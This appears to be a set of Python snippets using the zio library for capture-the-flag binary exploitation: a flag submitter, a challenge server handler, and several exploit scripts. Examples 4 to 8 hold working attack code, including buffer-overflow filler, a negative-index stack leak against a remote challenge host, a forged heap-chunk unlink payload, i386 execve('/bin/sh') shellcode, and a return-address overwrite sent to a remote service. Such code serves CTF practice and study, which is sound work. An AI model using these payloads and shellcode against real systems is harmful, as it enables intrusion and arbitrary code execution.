Example #1
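def submit_flag(flag):
    """Submit one flag to the jury service and return the matching verdict.

    A fresh connection to (HOST, PORT) is opened for every flag; connection
    attempts are retried every 0.3 s until one succeeds. The response is
    matched against VERDICT_MESSAGES and the verdict of the first message
    found in it is returned.

    Returns:
        The verdict paired with the first matching message, or None when the
        response contains none of the known messages.
    """
    # flags are now submitted using one connection per flag
    # whilst testing systems allow submitting multiple flags
    # during one connection. TODO
    log.debug("Submitting flag %s", flag)
    try_number = 0
    while True:
        try_number += 1
        try:
            connection = zio.zio(
                    (HOST, PORT), print_read=False, print_write=False)
            break
        except Exception:
            # Exception rather than a bare except: KeyboardInterrupt and
            # SystemExit must still be able to stop this unbounded retry loop.
            log.debug("Unsuccessful connection attempt")
            if try_number % 10 == 0:
                log.error("%d unsuccessful connections in a row", try_number)
            time.sleep(0.3)

    try:
        connection.read_line()  # jury greeting
        connection.write(flag + "\n")
        response = connection.read().strip()
    finally:
        # Release the socket even when the exchange fails part-way, so a
        # misbehaving jury service cannot make the submitter leak connections.
        connection.close()

    log.debug("Response for %s: '%s'", flag, response)

    for verdict, message in VERDICT_MESSAGES:
        if message in response:
            return verdict
    # No known message matched; callers get None and must treat it as
    # "verdict unknown" rather than as an accepted flag.
    return None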
Example #2
 def run(self):
     """Open the zio session, play every round of every level, then go interactive.

     After each round the question/answer pair of the *previous* round is
     handed to level.write_cache(); the first call therefore receives two
     empty strings.
     """
     session = zio.zio(
         self.__zio_target,
         print_read=self.__zio_print_read,
         print_write=self.__zio_print_write,
         timeout=self.__zio_timeout,
     )
     self.recv_welcome(session)

     prev_question, prev_answer = '', ''
     for level in self.level_list:
         for _ in xrange(level.round):
             question, answer = level.run(session)
             # Cache the pair from the round before this one.
             level.write_cache(prev_question, prev_answer)
             prev_question, prev_answer = question, answer

     session.interact()
Example #3

def show():
    """Send menu choice '4' as one line on the shared module-level `io` session."""
    choice = '4'
    io.writeline(choice)

def add_tv(name, season=0, rating=0, intro='A'):
    """Send menu choice '1' followed by name, season, rating and intro.

    season and rating are converted with str(); name and intro are sent as
    given. All five values go out through io.writelines() on the shared
    module-level `io` session.
    """
    fields = ['1', name]
    fields.extend(str(value) for value in (season, rating))
    fields.append(intro)
    io.writelines(fields)

def remove(name):
    """Send menu choice '3' followed by `name` on the shared module-level `io` session."""
    request = ['3']
    request.append(name)
    io.writelines(request)


# Session shared by show(), add_tv() and remove().
io = zio.zio(TARGET)

# Add the titles 'A' and 'B', then add both again under the same names,
# before handing the session over to the terminal.
for _title in ('A', 'B') * 2:
    add_tv(_title)
del _title
io.interact()
# remove('A')

# io.read_until_timeout()
# show()
# io.read_until('TV <')
# remove(io.read_until('> season')[:-len('> season')])

# raw_input()
Example #4
#!/usr/bin/env python
# encoding:utf-8

import zio

# 128 filler bytes, sent to the program as a single line.
payload = "A" * 128
# Spawn the local binary ./a.out under zio, feed it the line, then hand the
# session to the terminal so its reaction to the long input can be observed.
Io = zio.zio("./a.out")
Io.writeline(payload)
Io.interact()
import zio
import struct
import time

# Target selection: the commented-out tuple is a local test endpoint, the
# active one is the remote challenge host.
#T = ("127.0.0.1",4444)
T = ("library.polictf.it",80)
io = zio.zio(T)

# Index that is sent (minus 1) in answer to the "title:" prompt. It is
# negative, so it refers to a position before the start of whatever the
# service indexes with it.
# NOTE(review): the name suggests that position overlaps a saved frame
# pointer; the target's layout is not shown here -- confirm. If so, the root
# cause on the service side would be a missing lower-bound check on the index.
off_addr_ebp = -35

# Step 1 -- set offset: wait for the menu (it ends with "exit"), choose "a",
# answer "title:" with the negative index, then send the 4-byte line "AAAA".
io.read_until("exit")
io.write("a\n")
io.read_until("title:")
io.write(str(off_addr_ebp-1) + "\n")
payload = "AAAA"
io.write(payload + "\n")

# Step 2 -- get addr: choose "r", answer "read:" with "1", and take four raw
# bytes out of the reply.
io.read_until("exit")
io.write("r\n")
io.read_until("read:")
io.write("1\n")
io.read(1) # skip one byte that precedes the value
res = io.read(4)
# "<I" = little-endian unsigned 32-bit integer.
addr_ebp = struct.unpack("<I",res)[0]
print "\nebp:",hex(addr_ebp)

# Buffer address derived from the leaked value by a fixed distance.
# NOTE(review): 1037 is presumably specific to this one binary -- confirm.
addr_buf = addr_ebp - 1037
print 'addr buf:',hex(addr_buf)
Example #6
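def edit(index, size=None, buf=None):
    """Send menu choice '3' to overwrite entry `index` on the shared `io` session.

    With `buf` given, its length is announced and the bytes are sent as-is
    (`size` is ignored). Without `buf`, `size` is announced and NOPS(size)
    is sent instead.

    Raises:
        ValueError: if neither `size` nor `buf` is supplied. Previously this
            case sent the literal text "None" as the length before failing
            inside NOPS(), leaving the session in a half-written state.
    """
    if buf is None:
        if size is None:
            raise ValueError("edit() needs either size or buf")
        io.writelines(['3', str(index), str(size)])
        # NOPS is defined elsewhere in the file; presumably it returns `size`
        # filler bytes -- TODO confirm.
        io.write(NOPS(size))
    else:
        io.writelines(['3', str(index), str(len(buf))])
        io.write(buf)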


def delete(index):
    """Send menu choice '4' followed by the entry index on the shared `io` session."""
    request = ['4', str(index)]
    io.writelines(request)


# Session shared by the menu helpers (edit, delete, and new, which is defined
# outside the lines shown).
io = zio.zio(TARGET)

# Five allocations; the trailing comments record the index each one is
# expected to receive from the service.
new(0x100)  # id = 0
new(0x100)  # id = 1
new(0x10)  # id = 2
new(0x10)  # id = 3
new(0x200)  # id = 4

# Six little-endian 64-bit words (zio.l64), 48 bytes in total, written into
# entry 1: two words of 0x100, two addresses derived from 0x6016C0 + 0x28
# (minus 0x18 and minus 0x10), then two zero words.
# NOTE(review): this looks like a forged heap-chunk header whose two link
# fields point just below a stored pointer at 0x6016C0 + 0x28; that reading
# depends on the target binary and allocator, which are not shown -- confirm.
payload = zio.l64(0x100)
payload += zio.l64(0x100)
payload += zio.l64(0x6016C0 + 0x28 - 0x18)
payload += zio.l64(0x6016C0 + 0x28 - 0x10)
payload += zio.l64(0) * 2
edit(1, buf=payload)

# raw_input()
Example #7
import zio

# 28 filler bytes. Only its length and its first 5 bytes ("AAAAB") end up in
# the payload below.
junk = "AAAABBBBCCCCDDDDEEEEFFFFGGGG"
# 23 bytes of i386 machine code. The pushed immediates spell "//sh" and
# "/bin", 0x0b is loaded into al, and the sequence ends with int 0x80 (cd 80).
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80"

Io = zio.zio("./main")
# The program's first output line is expected to start with "Address : 0x";
# the next 8 hex digits are parsed and re-packed as a little-endian 32-bit
# value (zio.l32).
# NOTE(review): a binary that prints one of its own addresses hands out the
# information that address-space randomisation is meant to hide.
address = zio.l32(int(Io.readline().replace("Address : 0x", "")[0:8], 16))
# shellcode padded with the head of junk to exactly len(junk) bytes, followed
# by the 4-byte address.
payload = (shellcode + junk)[0:len(junk)] + address
# NOTE(review): in the lines shown, payload is built but never written to Io.
Io.interact()
Example #8
import zio

# 0x88 (136) filler bytes.
junk = "A" * 0x88
# Seven bytes, least-significant first: 0x400596 followed by four zero bytes.
# NOTE(review): a complete little-endian 64-bit value would be eight bytes --
# confirm the 7-byte length is intended.
address = "\x96\x05\x40\x00\x00\x00\x00"
payload = junk + address

# The local binary is kept as a commented-out alternative; the active target
# is the remote challenge service.
# Io = zio.zio("./level0")
Io = zio.zio(("pwn2.jarvisoj.com", 9881))
# Sent with write(), so no trailing newline is appended by this script.
Io.write(payload)
Io.interact()
Example #9
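	def handle(self):
		"""Serve one client: token prompt, warm-up questions, timed levels, flag.

		Changes against the earlier version of this handler:
		  * every client answer is parsed by _read_int_answer(), so a
		    non-numeric line counts as a wrong answer instead of raising
		    ValueError out of the handler;
		  * the four copy-pasted level loops are one helper, _run_rounds(),
		    which always closes the ./calc child process, also when the
		    client answers wrongly or the socket times out.
		"""
		print 'get connection from',self.client_address
		self.request.settimeout(10)
		self.wfile.write('TOKEN=')
		self.token = self.rfile.readline().strip()
		# NOTE(review): the token is client-controlled and is printed to the
		# operator's stdout unescaped, here and at the end of this method.
		# Control characters in it reach the console/log as-is; consider
		# printing repr(self.token) if nothing parses these lines.
		print 'TOKEN='+self.token
		if '' == self.token:
			self.wfile.write('\n\nwrong token\n')
			return
		print 'serving team {'+self.token+'} from ',self.client_address
		self.request.settimeout(50)

		# Introduction; the client acknowledges with one (ignored) line.
		self.wfile.write('GeruzoniAnsasu的舍友M大大最近去旁听了编译原理,回来问了一个问题把大家都难住了:\n')
		self.wfile.write('为啥处理语法树的时候要有人为规定的优先级?\n')
		self.wfile.write('如果优先级重新定义的话……\n\n')
		self.rfile.readline()
		self.wfile.write('example: 2*4+5\n')
		self.wfile.write('  (2*4)+5 = 13\n')
		self.wfile.write('  2*(4+5) = 18\n\n')
		self.wfile.write('那么所有这些情况的结果和是多少呢?(31)\n')
		if self.rfile.readline().strip() != '31':
			return

		# Warm-up: three questions drawn at random from six fixed samples,
		# each to be answered correctly within 50 seconds.
		self.wfile.write('\n\n先来熟悉熟悉吧:\n')
		smps = (('1*2+3',10),('4-3+7',2),('9*3-5',4),('6+7*8',166),('15+3*8-7',255),('3*8+11+4',316))
		for i in range(3):
			t1 = time()
			s,v = smps[randrange(6)]
			self.wfile.write(s+' sum = ?\n')
			ans = self._read_int_answer()
			t2 = time()
			if ans != v or t2-t1 > 50:
				self.wfile.write('噫……\n')
				return

		# Explanation of the compact notation used by the timed levels.
		self.wfile.write('\n\n还可以,我感觉你已经理解意思了。\n')
		self.wfile.write('现在让我们换一种表达方式,如下:\n\n')
		self.wfile.write('6[2,5,10,9,3,34]++*-*\n')
		self.wfile.write('答案159001\n\n')
		self.wfile.write('以防数字太大,所有答案mod 1e9+7.\n')
		self.rfile.readline()

		# LV1: one fixed question under the LV1 timeout.
		self.wfile.write('那么,lv1,计时开始:)\n\n')
		self.request.settimeout(self.TO_LV1)
		self.wfile.write('2[0,10]- \n')
		if self._read_int_answer() != 999999997:
			self.wfile.write('再想想\n')
			return
		seed(time())
		print '--LV1--'
		# The generated LV1 rounds (randrange(5,8) rounds of randrange(8,18)
		# operands) were already switched off: their loop body began with
		# `break`. That is kept, so no generated LV1 question is asked.

		print '--LV2--'
		self.wfile.write('可喜可贺!\nlv2,时限更严:)\n\n')
		self.request.settimeout(self.TO_LV2)
		if not self._run_rounds(randrange(10,20), 12, 30):
			print ':('
			return

		print '--LV3--'
		self.wfile.write('有希望看到flag了!\nlv3,证明你是精英的时候:)\n\n')
		self.request.settimeout(self.TO_LV3)
		if not self._run_rounds(10, 90, 150):
			return

		print '--LV4--'
		self.wfile.write('\nINSANE!!\n\n')
		self.request.settimeout(self.TO_LV4)
		if not self._run_rounds(2, 700, 900):
			return

		self.wfile.write('here you got the flag, but i removed some code from original file.\n')
		print 'team {%s} got the flag.' % self.token

	def _read_int_answer(self):
		"""Read one line from the client and return it as an int.

		Returns None when the line is not a valid integer (including an empty
		line at end of stream), which never equals an expected answer.
		"""
		try:
			return int(self.rfile.readline().strip())
		except ValueError:
			return None

	def _run_rounds(self, rounds, lo, hi):
		"""Ask `rounds` generated questions with randrange(lo, hi) operands each.

		Each question is n numbers below 1e9+7 and n-1 operators drawn from
		`ops`; the reference answer is read from a ./calc child process.
		Returns True when every client answer matched, False at the first
		mismatch.
		"""
		for i in xrange(rounds):
			n = randrange(lo, hi)
			sz_calc = str(n)+'\n'   # text fed to ./calc
			sz_send = str(n)        # text shown to the client
			l = []
			for j in xrange(n):
				num = randrange(1e9+7)
				sz_calc += str(num)+' '
				l.append(num)
			sz_calc += '\n'
			sz_send += repr(l)
			for j in xrange(n-1):
				sign = ops[randrange(3)]
				sz_calc += sign
				sz_send += sign
			io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'')
			try:
				io.writeline(sz_calc)
				right_ans = int(io.readline().strip())
				print 'R->',right_ans
				self.wfile.write(sz_send+'\n')
				ans = self._read_int_answer()
				print '<-A',ans
				if ans != right_ans:
					return False
			finally:
				# Close the child on every exit path. The early returns used
				# to skip io.close(), so each wrong answer or timeout left a
				# ./calc process behind on a publicly reachable service.
				io.close()
		return True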